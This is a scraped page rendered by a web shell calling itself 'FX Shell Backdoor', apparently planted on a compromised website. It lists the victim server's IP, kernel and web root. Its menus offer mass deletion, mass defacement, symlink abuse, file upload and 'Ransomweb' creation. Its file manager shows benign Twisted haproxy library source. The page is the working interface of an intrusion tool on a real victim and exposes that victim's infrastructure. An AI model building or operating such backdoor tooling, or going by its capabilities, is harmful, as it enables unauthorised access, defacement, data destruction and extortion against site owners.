FX Shell Backdoor
Home
Tools
Mass Delete
Mass Deface
Symlink
About
Website : vivehg.com
Ip Address : 172.31.2.149
Port : 443
Kernel : Linux 52-72-122-155.cprapid.com 5.15.0-1084-aws #91~20.04.1-Ubuntu SMP Fri May 2 06:59:36 UTC 2025 x86_64
Protokol : HTTP/1.1
Save Data :
Koneksi :
Server : Apache
Root : /home/vivehg/public_html
G-Interface : CGI/1.1
R-Method : GET
Browser : Lainnya
Version Shell : 1.0 (Release candidate)
Author : FierzaXploit/Mr.MF33
Type
Name
options
PATH :
/
lib
/
python3
/
dist-packages
/
twisted
/
protocols
/
haproxy
/
Upload
Buat File
Buat Folder
Buat Ransomweb
# -*- test-case-name: twisted.protocols.haproxy.test.test_wrapper -*- # Copyright (c) Twisted Matrix Laboratories. # See LICENSE for details. """ Protocol wrapper that provides HAProxy PROXY protocol support. """ from twisted.protocols import policies from twisted.internet import interfaces from twisted.internet.endpoints import _WrapperServerEndpoint from ._exceptions import InvalidProxyHeader from ._v1parser import V1Parser from ._v2parser import V2Parser class HAProxyProtocolWrapper(policies.ProtocolWrapper, object): """ A Protocol wrapper that provides HAProxy support. This protocol reads the PROXY stream header, v1 or v2, parses the provided connection data, and modifies the behavior of getPeer and getHost to return the data provided by the PROXY header. """ def __init__(self, factory, wrappedProtocol): policies.ProtocolWrapper.__init__(self, factory, wrappedProtocol) self._proxyInfo = None self._parser = None def dataReceived(self, data): if self._proxyInfo is not None: return self.wrappedProtocol.dataReceived(data) if self._parser is None: if ( len(data) >= 16 and data[:12] == V2Parser.PREFIX and ord(data[12:13]) & 0b11110000 == 0x20 ): self._parser = V2Parser() elif len(data) >= 8 and data[:5] == V1Parser.PROXYSTR: self._parser = V1Parser() else: self.loseConnection() return None try: self._proxyInfo, remaining = self._parser.feed(data) if remaining: self.wrappedProtocol.dataReceived(remaining) except InvalidProxyHeader: self.loseConnection() def getPeer(self): if self._proxyInfo and self._proxyInfo.source: return self._proxyInfo.source return self.transport.getPeer() def getHost(self): if self._proxyInfo and self._proxyInfo.destination: return self._proxyInfo.destination return self.transport.getHost() class HAProxyWrappingFactory(policies.WrappingFactory): """ A Factory wrapper that adds PROXY protocol support to connections. """ protocol = HAProxyProtocolWrapper def logPrefix(self): """ Annotate the wrapped factory's log prefix with some text indicating the PROXY protocol is in use. @rtype: C{str} """ if interfaces.ILoggingContext.providedBy(self.wrappedFactory): logPrefix = self.wrappedFactory.logPrefix() else: logPrefix = self.wrappedFactory.__class__.__name__ return "%s (PROXY)" % (logPrefix,) def proxyEndpoint(wrappedEndpoint): """ Wrap an endpoint with PROXY protocol support, so that the transport's C{getHost} and C{getPeer} methods reflect the attributes of the proxied connection rather than the underlying connection. @param wrappedEndpoint: The underlying listening endpoint. @type wrappedEndpoint: L{IStreamServerEndpoint} @return: a new listening endpoint that speaks the PROXY protocol. @rtype: L{IStreamServerEndpoint} """ return _WrapperServerEndpoint(wrappedEndpoint, HAProxyWrappingFactory)
__pycache__
Choose...
Rename
Delete
Now
test
Choose...
Rename
Delete
Now
__init__.py
Choose...
Edit
Rename
Delete
Now
__pycache__
Choose...
Edit
Rename
Delete
Now
_exceptions.py
Choose...
Edit
Rename
Delete
Now
_info.py
Choose...
Edit
Rename
Delete
Now
_interfaces.py
Choose...
Edit
Rename
Delete
Now
_parser.py
Choose...
Edit
Rename
Delete
Now
_v1parser.py
Choose...
Edit
Rename
Delete
Now
_v2parser.py
Choose...
Edit
Rename
Delete
Now
_wrapper.py
Choose...
Edit
Rename
Delete
Now
test
Choose...
Edit
Rename
Delete
Now